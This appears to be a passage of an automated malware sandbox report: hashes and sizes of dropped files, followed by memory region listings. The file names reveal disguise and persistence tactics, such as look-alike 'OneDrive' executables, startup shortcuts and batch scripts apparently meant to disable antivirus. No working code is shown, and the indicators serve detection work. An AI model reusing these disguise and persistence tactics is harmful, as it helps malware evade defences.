                                                        b48ea96eeeb0b0d19044d2fcf0fab23379377284483c5521b2923b5c253ba888

                                                        SHA512

                                                        2d3d5f353536b35e9d4f329f175fe2b7cfaa6e97362b6d1d0cdac212d7af29b052f6c198c5318f61e386aceb9b50aea265b692ad4f2ebed65751f83722b26c88

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        121a87ac52d2bcf48a92ad69df9905e4

                                                        SHA1

                                                        1af61383173e1d7b282a2b02032fad94664f0820

                                                        SHA256

                                                        d73e8c4ae238396d15f5f8b17251cd7dc8b99cc5e13482529e4eded1130683cd

                                                        SHA512

                                                        d7df3eb1bc9d9da6d56aa3ae4e4f20b4bbfb9deee458976e64a9f1e94459b0f6314df6fd1e98cb2e38f86a63f0ec3b24559e1413675cd90cbee095631a617a9f

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        35cd64b8807d41cbf99ee45ac368c574

                                                        SHA1

                                                        22308dff89b1806785b6014901a58e5f4a1011d8

                                                        SHA256

                                                        c7babb4e39183dbc645f9ff985f4a97c8342c6f5dd43a6d499302c28192edef1

                                                        SHA512

                                                        cd6f2ee3a5a60f9a41bace261424515b6111094e92896861d5e45e7064af92171ccb60c0a0e20806c26b5175e5d4696bab01d09668c779951f6cd3f008497203

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        7fd3a887984f673bf1c9c6899dcb2d4a

                                                        SHA1

                                                        0526900cd02d5ad66c76153465ecee1ee388f6c7

                                                        SHA256

                                                        d7afa95efe6ff259adf05b4347255b3f0c64e535f3252c59904dcdba65936fd2

                                                        SHA512

                                                        991a9530073035d1bb62841e3960328c970a0b80964cca7dd251c2d4bb0230b5dbee7f2f17b843148ace8a45e17c32dc0f0e5dae1dbd26d312ab58add0be54a2

                                                      • C:\Users\Admin\AppData\Local\Temp\FanUpdate.exe

                                                        Filesize

                                                        13.6MB

                                                        MD5

                                                        8b2fa6497ba4fc285a5545bda2e8cde6

                                                        SHA1

                                                        31cec6fb97888c34c80af8ca73aa67456f68e4e3

                                                        SHA256

                                                        5197fcb7b98a65eabf8151d847bb394eccd65a184f06a82f674a9b95e62e701c

                                                        SHA512

                                                        fbf93ca3aecabdbb4a8c978037ca15f14b990fdd32c892e0fdd8bbb491bde8005fbf8326dbd89adf71e9c7cca7f1592dc7ef5694cc45181a50332ed6a594ee40

                                                      • C:\Users\Admin\AppData\Local\Temp\FunChecker.bat

                                                        Filesize

                                                        3KB

                                                        MD5

                                                        42afdea7c75bc9074a22ff1be2787959

                                                        SHA1

                                                        24bc20691a1e99e2cf0b2bca78694701fa47720a

                                                        SHA256

                                                        3d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2

                                                        SHA512

                                                        d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9

                                                      • C:\Users\Admin\AppData\Local\Temp\Micrasoft OneDrive.exe

                                                        Filesize

                                                        2.2MB

                                                        MD5

                                                        f28d1fe257c2754bf1b3f0e1fad62731

                                                        SHA1

                                                        48d73b4b27c42d70985262ae468b8fe4884b3088

                                                        SHA256

                                                        f07ee7e0952cb1adf6f3635a74fd165cf6de93fd0f86edadc24f4b35264d2a5a

                                                        SHA512

                                                        3621ce5c11720b1b7547e26e32947f4b41ca55a128d1ac8e1b8738e8da7eb7fc0e375d846371f01a668806f9a48d3edcac3894134793aaa3668b76c7fcdd7ecf

                                                      • C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe

                                                        Filesize

                                                        2.1MB

                                                        MD5

                                                        c9805a18753f074961692ba5d93173d9

                                                        SHA1

                                                        3735c69e4a6a85f422b1cd4c6e7c6e1b35a5600b

                                                        SHA256

                                                        9941d87b8bc2fdc1600b82c60d3679a0481f571cd41fe2841cc6058c1eb7d8e6

                                                        SHA512

                                                        84cac01b222fa4357086ed5489759b59a8aac79c02d7706007c9f39eb1cbc3a3765701d64d0fcf1f4eafc6124aff15673fd73177631c60d30101cacd2a8b77b2

                                                      • C:\Users\Admin\AppData\Local\Temp\XClient.exe

                                                        Filesize

                                                        2.2MB

                                                        MD5

                                                        26bd039b1fb29f388adf79135f5ba40e

                                                        SHA1

                                                        d144e02494343f05d84326ac384709d824bf7953

                                                        SHA256

                                                        cc32a9b2888305b8854017914aec48af2e8f35402ce72f95efbd86627d9df466

                                                        SHA512

                                                        5eb35f8df5142471154ea3b7e0cc3df776b576b0818bf4ee5134e4e3edc94608b9c15a6f5131b97ee19f85c55fba6ec15fa5783167074d3778a82156ccb3ab57

                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u2ygttdf.uvp.ps1

                                                        Filesize

                                                        1B

                                                        MD5

                                                        c4ca4238a0b923820dcc509a6f75849b

                                                        SHA1

                                                        356a192b7913b04c54574d18c28d46e6395428ab

                                                        SHA256

                                                        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                        SHA512

                                                        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                      • C:\Users\Admin\AppData\Local\Temp\anti_pros_disp.bat

                                                        Filesize

                                                        842B

                                                        MD5

                                                        ee877037203d8c16d52690baaecfb371

                                                        SHA1

                                                        3f2401fb6c9bbf85b62deeb082e2ea699a936863

                                                        SHA256

                                                        cbc33d31c79dfe89a693a7c9d63fa546ae7ccc40514bb074c2ab61a16baa45b6

                                                        SHA512

                                                        f32061ab690ebd313d44befeef2e6ffb06b30fd3ece7a09d57aff142d0c9507562275f6efce23c9a199324ff77ed98d3641596fd80eb3e2adebcb031473dbfa8

                                                      • C:\Users\Admin\AppData\Local\Temp\avdisable.bat

                                                        Filesize

                                                        3KB

                                                        MD5

                                                        4c35b71d2d89c8e8eb773854085c56ea

                                                        SHA1

                                                        ede16731e61348432c85ef13df4beb2be8096d9b

                                                        SHA256

                                                        3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42

                                                        SHA512

                                                        a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d

                                                      • C:\Users\Admin\AppData\Local\Temp\clear_av.bat

                                                        Filesize

                                                        5KB

                                                        MD5

                                                        48d1db006fe2ae378b0f7efd561d7e56

                                                        SHA1

                                                        63df10216f0ad81d1d42dd2fc8c4483be5d077fc

                                                        SHA256

                                                        65428112138dff324acd39babd902959dbb78b6ed74a276a1d3c9993ae52847a

                                                        SHA512

                                                        079fa75df35b8fea18fb220b3f005d6384b28aedb2e5ae62ddd3f6db6abda7dbab091fd44d05dffb4ec41657e052f379267eef7c5126fd8bd7eb189f147806f5

                                                      • C:\Users\Admin\AppData\Local\Temp\system32.exe

                                                        Filesize

                                                        2.3MB

                                                        MD5

                                                        b198b92325d73a7b4994a481be7cf337

                                                        SHA1

                                                        1b1d72d1a5ac6e90c8daaa160b210903cfc76f5c

                                                        SHA256

                                                        e5c0819c18a018b6e77e27c9c7d05050dd8a45c0a2bd8ab08aaf19fff35c3c92

                                                        SHA512

                                                        d18316f3c5ef53716ba26bc01105ef4192cf94fd04e02fb3433222962649d279e8052305f101d516617821c620e8c189379f143333a6995f51de1a4f168a56a9

                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunCheker.lnk

                                                        Filesize

                                                        820B

                                                        MD5

                                                        32fa189bc3ddd26b2684dd1d46601424

                                                        SHA1

                                                        5c486374292a110c46eefa58e04faa0e87b70792

                                                        SHA256

                                                        d2754da7ba7bb0caa2c1e9a466ab2cb3e3e110e33bd597f15b5d7b039bfe39e1

                                                        SHA512

                                                        551c7f2b0d5f0dcbd6b587fab6406f76934df28c5fd5c2aa159bfa331c8f997ec76918ab4897f6830f562b65155bc9e456c6962f99df37be671ed65ba36fb42a

                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Maicrasoft OneDrive.lnk

                                                        Filesize

                                                        870B

                                                        MD5

                                                        b3e52c602c7be6dd67056892bd870b8f

                                                        SHA1

                                                        e66889c9a9e3df48426fd92d0dd284334dea4cef

                                                        SHA256

                                                        790dd2fd011bc534d0fe82f75117897dec9534827aad691f6c75f79004018d81

                                                        SHA512

                                                        86e4c5fc9fa36ebfdd46e7c986d0c6b5fdbe0ee2515bb6a863d341092e6661fc4ed939586e71cd152990c644d9ae2b7711d0ac4aa7f4954ea83105db4cab36f6

                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk

                                                        Filesize

                                                        673B

                                                        MD5

                                                        980a16f3dc181bbc2e7ff2dcb7814fa2

                                                        SHA1

                                                        89087d3a6147265c0090c53bdec64f7f2d720dd2

                                                        SHA256

                                                        6fb92fc9038b3ff26e69e6ae7ba3ef01c23c55dd09a858b7ff8c0ea9a8757808

                                                        SHA512

                                                        4df7213a2af47b6becd46a0ea973820ab481a6e0282a41319f50c551a53d28552433ad3ef96087979f43daabf32f24d8f3ac7e9576d463d1109b107c9a5af91a

                                                      • memory/32-3102-0x0000000009480000-0x000000000948A000-memory.dmp

                                                        Filesize

                                                        40KB

                                                      • memory/32-20-0x0000000001100000-0x000000000169C000-memory.dmp

                                                        Filesize

                                                        5.6MB

                                                      • memory/32-8-0x0000000001100000-0x000000000169C000-memory.dmp

                                                        Filesize

                                                        5.6MB

                                                      • memory/32-3255-0x0000000001100000-0x000000000169C000-memory.dmp

                                                        Filesize

                                                        5.6MB

                                                      • memory/32-61-0x0000000007E70000-0x0000000007ED6000-memory.dmp

                                                        Filesize

                                                        408KB

                                                      • memory/32-21-0x0000000007DD0000-0x0000000007E6C000-memory.dmp

                                                        Filesize

                                                        624KB

                                                      • memory/32-19-0x0000000001100000-0x000000000169C000-memory.dmp

                                                        Filesize

                                                        5.6MB

                                                      • memory/208-3260-0x00007FFB35280000-0x00007FFB35C6C000-memory.dmp

                                                        Filesize

                                                        9.9MB

                                                      • memory/208-15-0x00007FFB35280000-0x00007FFB35C6C000-memory.dmp

                                                        Filesize

                                                        9.9MB

                                                      • memory/208-17-0x0000000000AA0000-0x0000000001EFC000-memory.dmp

                                                        Filesize

                                                        20.4MB

                                                      • memory/860-2527-0x000000006F5B0000-0x000000006F5FB000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/1888-55-0x0000000001280000-0x0000000001804000-memory.dmp

                                                        Filesize

                                                        5.5MB

                                                      • memory/1888-65-0x0000000001280000-0x0000000001804000-memory.dmp

                                                        Filesize

                                                        5.5MB

                                                      • memory/1888-67-0x0000000001280000-0x0000000001804000-memory.dmp

                                                        Filesize

                                                        5.5MB

                                                      • memory/1888-3263-0x0000000001280000-0x0000000001804000-memory.dmp

                                                        Filesize

                                                        5.5MB

                                                      • memory/2692-16-0x00007FFB35280000-0x00007FFB35C6C000-memory.dmp

                                                        Filesize

                                                        9.9MB

                                                      • memory/2692-0-0x00007FFB35283000-0x00007FFB35284000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/2692-3-0x00007FFB35280000-0x00007FFB35C6C000-memory.dmp

                                                        Filesize

                                                        9.9MB

                                                      • memory/2692-1-0x0000000000290000-0x000000000123E000-memory.dmp

                                                        Filesize

                                                        15.7MB

                                                      • memory/4080-569-0x000000006F5B0000-0x000000006F5FB000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/4104-64-0x0000000000F10000-0x00000000014FA000-memory.dmp

                                                        Filesize

                                                        5.9MB

                                                      • memory/4104-2616-0x0000000009BE0000-0x0000000009BF2000-memory.dmp

                                                        Filesize

                                                        72KB

                                                      • memory/4104-2615-0x0000000009750000-0x000000000975A000-memory.dmp

                                                        Filesize

                                                        40KB

                                                      • memory/4104-3257-0x0000000000F10000-0x00000000014FA000-memory.dmp

                                                        Filesize

                                                        5.9MB

                                                      • memory/4104-68-0x00000000083D0000-0x00000000088CE000-memory.dmp

                                                        Filesize

                                                        5.0MB

                                                      • memory/4104-1597-0x0000000009930000-0x000000000994E000-memory.dmp

                                                        Filesize

                                                        120KB

                                                      • memory/4104-66-0x0000000007E30000-0x0000000007EC2000-memory.dmp

                                                        Filesize

                                                        584KB

                                                      • memory/4104-63-0x0000000000F10000-0x00000000014FA000-memory.dmp

                                                        Filesize

                                                        5.9MB

                                                      • memory/4104-48-0x0000000000F10000-0x00000000014FA000-memory.dmp

                                                        Filesize

                                                        5.9MB

                                                      • memory/4104-1596-0x00000000097E0000-0x0000000009830000-memory.dmp

                                                        Filesize

                                                        320KB

                                                      • memory/4216-1795-0x000000006F5B0000-0x000000006F5FB000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/4276-76-0x00000000079D0000-0x0000000007A36000-memory.dmp

                                                        Filesize

                                                        408KB

                                                      • memory/4276-75-0x00000000070F0000-0x0000000007112000-memory.dmp

                                                        Filesize

                                                        136KB

                                                      • memory/4276-122-0x000000006F5B0000-0x000000006F5FB000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/4276-81-0x00000000083F0000-0x000000000843B000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/4276-79-0x0000000007A40000-0x0000000007D90000-memory.dmp

                                                        Filesize

                                                        3.3MB

                                                      • memory/4276-73-0x00000000046A0000-0x00000000046D6000-memory.dmp

                                                        Filesize

                                                        216KB

                                                      • memory/4276-82-0x0000000008190000-0x0000000008206000-memory.dmp

                                                        Filesize

                                                        472KB

                                                      • memory/4276-74-0x0000000007150000-0x0000000007778000-memory.dmp

                                                        Filesize

                                                        6.2MB

                                                      • memory/4276-128-0x0000000009570000-0x0000000009604000-memory.dmp

                                                        Filesize

                                                        592KB

                                                      • memory/4332-3266-0x0000000000830000-0x0000000000DF0000-memory.dmp

                                                        Filesize

                                                        5.8MB

                                                      • memory/4332-70-0x0000000000830000-0x0000000000DF0000-memory.dmp

                                                        Filesize

                                                        5.8MB

                                                      • memory/4332-69-0x0000000000830000-0x0000000000DF0000-memory.dmp

                                                        Filesize

                                                        5.8MB

                                                      • memory/4332-56-0x0000000000830000-0x0000000000DF0000-memory.dmp

                                                        Filesize

                                                        5.8MB

                                                      • memory/4344-1515-0x000000006F5B0000-0x000000006F5FB000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/4636-524-0x00000000096D0000-0x00000000096D8000-memory.dmp

                                                        Filesize

                                                        32KB

                                                      • memory/4636-117-0x00000000091F0000-0x000000000920E000-memory.dmp

                                                        Filesize

                                                        120KB

                                                      • memory/4636-116-0x000000006F5B0000-0x000000006F5FB000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/4636-115-0x0000000009420000-0x0000000009453000-memory.dmp

                                                        Filesize

                                                        204KB

                                                      • memory/4636-127-0x0000000009560000-0x0000000009605000-memory.dmp

                                                        Filesize

                                                        660KB

                                                      • memory/4636-499-0x00000000096F0000-0x000000000970A000-memory.dmp

                                                        Filesize

                                                        104KB

                                                      • memory/4636-80-0x0000000007E40000-0x0000000007E5C000-memory.dmp

                                                        Filesize

                                                        112KB

                                                      • memory/5228-2013-0x000000006F5B0000-0x000000006F5FB000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/5428-1767-0x0000000008F40000-0x0000000008F62000-memory.dmp

                                                        Filesize

                                                        136KB

                                                      • memory/5428-1766-0x0000000008CD0000-0x0000000008CEA000-memory.dmp

                                                        Filesize

                                                        104KB

                                                      • memory/5456-1292-0x000000006F5B0000-0x000000006F5FB000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/5504-2677-0x000000006F5B0000-0x000000006F5FB000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/5604-1027-0x000000006F5B0000-0x000000006F5FB000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/5736-2257-0x000000006F5B0000-0x000000006F5FB000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/5756-712-0x000000006F5B0000-0x000000006F5FB000-memory.dmp

                                                        Filesize

                                                        300KB

                                                      • memory/6064-3011-0x000000006F5B0000-0x000000006F5FB000-memory.dmp

                                                        Filesize

                                                        300KB